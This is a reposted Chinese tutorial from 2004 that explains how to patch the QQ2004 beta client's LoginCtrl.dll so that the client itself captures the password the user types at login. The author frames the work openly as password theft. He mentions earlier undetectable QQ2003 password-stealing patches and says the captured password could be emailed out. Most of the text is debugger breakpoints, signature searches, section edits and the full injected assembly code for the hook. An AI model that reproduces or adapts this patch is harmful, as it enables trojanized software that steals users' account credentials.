QQ2004測(cè)試版密碼獲取演示

2004-6-2 19:14

2715

QQ2004測(cè)試版密碼獲取演示

2004-6-2 19:14

2715

水平不高，請(qǐng)大家包涵

最近快畢業(yè)了，比較忙。。。。

如果補(bǔ)丁在你那里不好用，請(qǐng)給我反饋。

QQ2004測(cè)試版密碼獲取演示

作者:nbw[NE365]

nboy.cnwlt.com

www.vxer.com

QQ??:343538175

以前我做過(guò)盜取QQ2003密碼的補(bǔ)丁。利用這種補(bǔ)丁修改QQ后，盜取密碼完全由QQ自身完成。基本不占用資源，不會(huì)被查殺。從理論上來(lái)講大部分需要填寫密碼的游戲或者程序都可以采用這種方法盜取號(hào)碼。現(xiàn)在QQ2004測(cè)試版出來(lái)了，其安全性比以往有了很大加強(qiáng)。其號(hào)碼的獲取和QQ2003基本一樣，但是密碼的處理更為復(fù)雜。下面我就說(shuō)說(shuō)如何獲取其密碼。

這里只是一個(gè)演示，當(dāng)用戶輸入密碼登陸后，會(huì)彈出對(duì)話框把用戶輸入的密碼顯示出來(lái)。從理論上來(lái)說(shuō)，做到這一步，便意味著可以隨便處理這個(gè)密碼(比如發(fā)送到某個(gè)郵箱，嘿嘿)，我現(xiàn)在很忙，寫東西也沒(méi)條理這篇文章更像一篇筆記，如果你覺(jué)得占用了你的時(shí)間，我實(shí)在很不好意思。

獲得保存號(hào)碼的地方:

如果輸入的號(hào)碼位數(shù)小于5,則提示錯(cuò)誤.可以下命令bpx messageboxa,再Pmodule返回程序

領(lǐng)空,向上查看,很容易可以得到獲取號(hào)碼的地點(diǎn)如下:

0167:01f63d5d? ?? ? call??....(當(dāng)然這個(gè)地址是變化的.)

返回的eax為號(hào)碼地址.且領(lǐng)空為L(zhǎng)oginctrl

下面有個(gè)函數(shù):QQHELPERDLL!?CheckQQUinValid@@YAHVCString@@@Z(看看命名,范了兵家大忌!),用來(lái)判定號(hào)碼的合法性,進(jìn)去以后可以看到:

:1000D8D6 8B4508? ?? ?? ?? ?? ?? ?mov eax, dword ptr [ebp+08]? ?;eax-->號(hào)碼

:1000D8D9 8B40F8? ?? ?? ?? ?? ?? ?mov eax, dword ptr [eax-08]? ? ;eax-->密碼

:1000D8DC 83F805? ?? ?? ?? ?? ?? ?cmp eax, 00000005? ?? ?? ? ;比較號(hào)碼長(zhǎng)度是否大于5

:1000D8DF 7D05? ?? ?? ?? ?? ?? ???jge 1000D8E6

領(lǐng)空為: QQHELPERDLL,也就是代碼在這個(gè)文件中.去這個(gè)文件查找上面的代碼,便可以找到.由于在TRW中看到的地址并不是個(gè)文件中的RVA(因?yàn)槭莿?dòng)態(tài)調(diào)用),所以查找這個(gè)地方應(yīng)該搜索特征碼,就是利用Search命令搜索上面這幾行代碼或者他們的Opcode.最好用WinHex打開(kāi)QQ進(jìn)程中的Loginctrl.dll領(lǐng)空來(lái)搜索.

保存密碼處:

找到了號(hào)碼存放位置以后,填寫號(hào)碼和密碼點(diǎn)下一步(最好填5位以下的密碼,這樣就不用進(jìn)入下一個(gè)界面).在上面的mov eax, dword ptr [ebp+08]處攔截下來(lái).下命令d eax,看到自己的號(hào)碼.向下(或者向上)不遠(yuǎn)便是自己輸入的密碼.這個(gè)存放密碼的位置是變化的.比如說(shuō)這次是在0030:008FB720處.下命令bpm 0030:008FB720 w .再次輸入登錄,被攔截.按F10,慢慢向下走,過(guò)了好幾個(gè)call,直到LOGINCTRL的領(lǐng)空.看看上面的函數(shù),為:

:10004C42 FF7510? ?? ?? ?? ?? ?? ?push [ebp+10]

:10004C45 FF750C? ?? ?? ?? ?? ?? ?push [ebp+0C]

:10004C48 FF7508? ?? ?? ?? ?? ?? ?push [ebp+08]

* Reference To: MFC42.Ordinal:062A, Ord:062Ah

|

:10004C4B E8E8110000? ?? ?? ?? ???Call 10005E38

:10004C50 8B4DF0? ?? ?? ?? ?? ?? ?mov ecx, dword ptr [ebp-10]

在Call 10005E38上下斷點(diǎn),會(huì)發(fā)現(xiàn)即使不操作QQ也會(huì)頻繁中斷在這個(gè)地點(diǎn).對(duì)我們來(lái)說(shuō),這是多么不幸啊! 所以,再次打開(kāi)斷點(diǎn)bpm 0030:008FB720 w ,重新登錄,被中斷,像剛才一樣F10,不斷向下走,觀察程序領(lǐng)空,當(dāng)然會(huì)再次看到Call 10005E38,不過(guò)不要管他,繼續(xù)向下走.不停看啊看啊,每次過(guò)了一個(gè)ret,如果發(fā)現(xiàn)領(lǐng)空不是系統(tǒng)領(lǐng)空(就是不是什么User或者kernel32)就向上看看上面的call,最后到了:0167:01D426DC??E855240000? ?call??MFC42!ord_00000942??,這里的領(lǐng)空仍然是LOGINCTRL,利用特征碼,在W32Dasm中查找"E855240000",具體就是:

:100026CE 8D8648050000? ?? ?? ?? ?lea eax, dword ptr [esi+00000548]

* Possible Reference to Dialog: DialogID_01C2, CONTROL_ID:00B4, ""

|

:100026D4 BBB4000000? ?? ?? ?? ???mov ebx, 000000B4

:100026D9 50? ?? ?? ?? ?? ?? ?? ? push eax? ?? ?? ?? ? ;存放密碼的地址

:100026DA 53? ?? ?? ?? ?? ?? ?? ? push ebx

:100026DB 57? ?? ?? ?? ?? ?? ?? ? push edi

* Reference To: MFC42.Ordinal:0942, Ord:0942h

|

:100026DC E855240000? ?? ?? ?? ???Call 10004B36? ?? ?? ???;**********關(guān)鍵函數(shù)

:100026E1 8D864C050000? ?? ?? ?? ?lea eax, dword ptr [esi+0000054C]

注意上面的CONTROL_ID:00B4,這里或許就是密碼框的ID.

對(duì)于每一個(gè)重要的函數(shù),分析其參數(shù)無(wú)疑是非常明智的.看看上面這個(gè)函數(shù),有三個(gè)參數(shù)eax,ebx,edi,多跟蹤幾次便會(huì)發(fā)現(xiàn),eax中為存放密碼的地址,函數(shù)的返回值是密碼長(zhǎng)度.但是函數(shù)好像沒(méi)有把密碼長(zhǎng)度存放起來(lái)(lea eax, dword ptr [esi+0000054C]),或許是密碼驗(yàn)證在函數(shù)中全部完成,跳出函數(shù)后不再需要?(猜想)

eax在函數(shù)入口時(shí)作為密碼存放地址,函數(shù)結(jié)束時(shí)為密碼長(zhǎng)度.而函數(shù)領(lǐng)空是系統(tǒng)領(lǐng)空,無(wú)法對(duì)其進(jìn)行修改.所以,可以在入棧的時(shí)候跳轉(zhuǎn)到我們的代碼,保存eax的值,在函數(shù)結(jié)束的時(shí)候再次跳轉(zhuǎn),再次保存eax以獲得密碼長(zhǎng)度.這樣2次SMC,肯定會(huì)很麻煩.有興趣可以試驗(yàn)一下,練手嘛.

幸運(yùn)的是入棧操作的上方有:100026CE??lea eax, dword ptr [esi+00000548] ,觀察一下[esi+00000548]的值,發(fā)現(xiàn)在函數(shù)執(zhí)行期間未曾發(fā)生變化.所以可以從[esi+00000548]獲得密碼存放地址.

不幸的是,這個(gè)函數(shù)雖然未曾被頻繁調(diào)用,但是在登錄的時(shí)候會(huì)被調(diào)用n次，這樣假如你要保存密碼，就會(huì)n次保存。雖然不礙事，就是麻煩些,并且這些數(shù)據(jù)中只有一個(gè)是真正的密碼.但是我還有余力對(duì)付這些LG,so,整理一下思路,后面再說(shuō)如何fuck it!

故此,我們得到以下結(jié)論:

當(dāng):100026DC E855240000? ?Call 10004B36??執(zhí)行完畢后(也就是在:100026E1處),[esi+00000548]中存放的是密碼的地址,eax中是密碼長(zhǎng)度.

獲取密碼演示:(每當(dāng)用戶登陸，便彈出對(duì)話框顯示用戶輸入的密碼)

用我的剩余空間分析器,分析一下LOGINCTRL文件的剩余空間:

名稱? ???RVA? ???OA? ?? ???尺寸D? ?可寫否

.text??0000681a??0000681a? ?2022? ?? ?否

.rdata??00009238??00009238? ?3528? ?? ?否

.data??0000b414??0000b414??-1044? ?? ?可

.rsrc??00017568??00016568? ?2712? ?? ?否

.reloc??00018b04??00017b04? ?1276? ?? ?否

.text段不錯(cuò).有2022字節(jié)空間.試驗(yàn)一下也可以正常載入,用Pedit把這個(gè)區(qū)段的屬性改為可寫可讀(不然的話無(wú)法在這個(gè)區(qū)段設(shè)置可寫變量)

打開(kāi)LOGINCTRL文件,修改:

:100026DC E855240000? ?? ?? ?? ???Call 10004B36

:100026E1 8D864C050000? ?? ?? ?? ?lea eax, dword ptr [esi+0000054C]

:100026E7 50? ?? ?? ?? ?? ?? ?? ???push eax

:100026E8 6844010000? ?? ?? ?? ?? ?push 00000144

為:

:100026DC E855240000? ?? ?? ?? ???Call 10004B36

:100026E1? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ???jmp??6830? ?? ?? ?;跳轉(zhuǎn)到剩余空間.

:100026E7? ?? ?? ?? ?? ?? ?? ?? ? push eax

少了:100026E1 8D864C050000? ?? ?? ?? ?lea eax, dword ptr [esi+0000054C] .記下來(lái),以后補(bǔ)上.

由于這個(gè)關(guān)鍵函數(shù)在很多時(shí)候都被調(diào)用,因此需要判斷是不是應(yīng)該獲得密碼的時(shí)候,我這里通過(guò)判斷eax和[4D6FAC]來(lái)判斷究竟是不是應(yīng)該獲取密碼,具體算法如下:

if??eax==00??then

;程序正在啟動(dòng),跳出

;這種判斷程序啟動(dòng)的方法,存在一個(gè)問(wèn)題,就是如果用戶的密碼本身為空,我們就采集不到了,因?yàn)槟菢拥脑捯矔?huì)導(dǎo)致eax=0

else

if? ???[4D6FAC]=00 then

;獲取密碼

[4D6FAC]=01

else

[4D6FAC]=00

endif

endif

這里的[4D6FAC]是標(biāo)志位.選這個(gè)地址的原因稍候再談.

動(dòng)態(tài)內(nèi)存地址的查找:

由于QQ2004的特殊處理,導(dǎo)致一些代碼執(zhí)行的時(shí)候所在的內(nèi)存地址是變化的.就比如上面的關(guān)鍵函數(shù),它的地址就是變化的.這樣無(wú)疑加強(qiáng)了安全性,也很明顯給我們提出了難度,因?yàn)楹貌蝗菀渍业降年P(guān)鍵地址下次就發(fā)生了變化,讓人很惱火.

好在地址的變化并不頻繁.幾天(或許一次開(kāi)機(jī))才變化一次.這樣就可以很容易找到我們需要的代碼的地址.比如要查找:100026DC E855240000? ? Call 10004B36? ?在內(nèi)存中的地址.可以用WinHex打開(kāi)QQ進(jìn)程中的Loginctrl.dll域.搜索這個(gè)函數(shù)的代碼,也就是"E855240000",注意用Hex模式搜索,并且不要用小尾方式,因?yàn)檫@是code段,不是data段.

找到后,比如說(shuō)是01D36835處的數(shù)據(jù)為E855240000 ,那么下命令bpx??0167:01D36835就可以攔截這個(gè)函數(shù)了.

標(biāo)志位地址確定(上面的[4D6FAC]):

上面說(shuō)過(guò),LOGINCTRL被加載了以后,其內(nèi)存地址(VA)并不是固定的, 按道理來(lái)說(shuō)對(duì)于這種情況可以采用重定位技術(shù),動(dòng)態(tài)獲取當(dāng)前eip,不過(guò)這里的LoginCtrl畢竟是dll,我估計(jì)不行,所以也沒(méi)試驗(yàn).有興趣的朋友可以看看.

所以標(biāo)志位就不要在這個(gè)文件中尋找.這樣可以去QQ主文件查找.需要找一個(gè)有可寫屬性的多余空間.4個(gè)字節(jié)大小就夠(其實(shí)一個(gè)就夠).

查看一下QQ.exe的節(jié)區(qū)屬性,只有.data段可寫.所以在這一段最后找一塊地方.這個(gè)地方需要可以正常加載,并且不會(huì)被使用. .rsrc(D7000處)區(qū)段上面有一段空白處.在這里填上全1,然后打開(kāi)QQ查看一下,發(fā)現(xiàn)有的地方不是1,說(shuō)明被使用了.有的地方是1,說(shuō)明沒(méi)有被使用(至少登陸的時(shí)候).其中Dword ptr [4D6FAC]就不錯(cuò).不要忘了把這地方填入的1再改為0.

變量組織:

對(duì)話框標(biāo)題: [1D368B0]=C3DCC2EBCAC73A(密碼是:)

標(biāo)記:? ?? ?[4D6FAC] =00? ?? ? ;獲取密碼

[4D6FAC] =01? ?? ? ;不獲取密碼

新添加代碼:

6830(OA)

6830:? ?? ?nop

nop

nop

pushad

cmp eax,000

je? ???@1

mov ecx,[4D6FAC]

cmp ecx,01

je? ???@1

push? ?? ? 00

push? ?? ? 1D368B0

mov ebx,[esi+548]? ?? ?? ?;ebx-->密碼地址

push? ?? ? ebx

push? ?? ? 00

call??dowrd? ???[004A49E0]? ? ;messageboxa

;請(qǐng)注意這里采用的是QQ.exe中的引入函數(shù),

;而不是LOGINCTRL中的引入函數(shù).

xor??eax,eax

inc? ?eax

mov [4D6FAC],eax

jmp??@2

@1:

xor??eax,eax

mov [4D6FAC],eax

@2:

popad

lea eax, dword ptr [esi+0000054C]

jmp 26e7

具體代碼見(jiàn)附錄

這樣當(dāng)輸入密碼和號(hào)碼,點(diǎn)擊登陸,便可以彈出對(duì)話框顯示密碼,由于該對(duì)話框不在QQ.exe領(lǐng)空,所以這里對(duì)話框會(huì)顯示在主界面下面,你可以把主界面挪動(dòng)一下就可以看到該對(duì)話框.

附錄:

新添加的代碼:

:10006830 90? ?? ?? ?? ?? ?? ?? ? nop

:10006831 60? ?? ?? ?? ?? ?? ?? ? pushad

:10006832 83F800? ?? ?? ?? ?? ?? ?cmp eax, 00000000

:10006835 7430? ?? ?? ?? ?? ?? ???je 10006867

:10006837 8B0DAC6F4D00? ?? ?? ?? ?mov ecx, dword ptr [004D6FAC]

:1000683D 83F901? ?? ?? ?? ?? ?? ?cmp ecx, 00000001

:10006840 7425? ?? ?? ?? ?? ?? ???je 10006867

:10006842 6A00? ?? ?? ?? ?? ?? ???push 00000000

:10006844 68B069D301? ?? ?? ?? ???push 01D369B0

:10006849 8B9E48050000? ?? ?? ?? ?mov ebx, dword ptr [esi+00000548]

:1000684F 53? ?? ?? ?? ?? ?? ?? ? push ebx

:10006850 6A00? ?? ?? ?? ?? ?? ???push 00000000

:10006852 90? ?? ?? ?? ?? ?? ?? ? nop

:10006853 90? ?? ?? ?? ?? ?? ?? ? nop

:10006854 FF15E0494A00? ?? ?? ?? ?call dword ptr [004A49E0]

:1000685A 33C0? ?? ?? ?? ?? ?? ???xor eax, eax

:1000685C 40? ?? ?? ?? ?? ?? ?? ? inc eax

:1000685D A3AC6F4D00? ?? ?? ?? ???mov dword ptr [004D6FAC], eax

:10006862 E907000000? ?? ?? ?? ???jmp 1000686E

* Referenced by a (U)nconditional or (C)onditional Jump at Addresses:

|:10006835(C), :10006840(C)

|

:10006867 33C0? ?? ?? ?? ?? ?? ???xor eax, eax

:10006869 A3AC6F4D00? ?? ?? ?? ???mov dword ptr [004D6FAC], eax

* Referenced by a (U)nconditional or (C)onditional Jump at Address:

|:10006862(U)

|

:1000686E 61? ?? ?? ?? ?? ?? ?? ? popad

:1000686F 8D864C050000? ?? ?? ?? ?lea eax, dword ptr [esi+0000054C]

:10006875 E96DBEFFFF? ?? ?? ?? ???jmp 100026E7:D

總結(jié)

以上是生活随笔為你收集整理的qq密码自动测试软件,QQ2004测试版密码获取演示的全部?jī)?nèi)容，希望文章能夠幫你解決所遇到的問(wèn)題。

如果覺(jué)得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。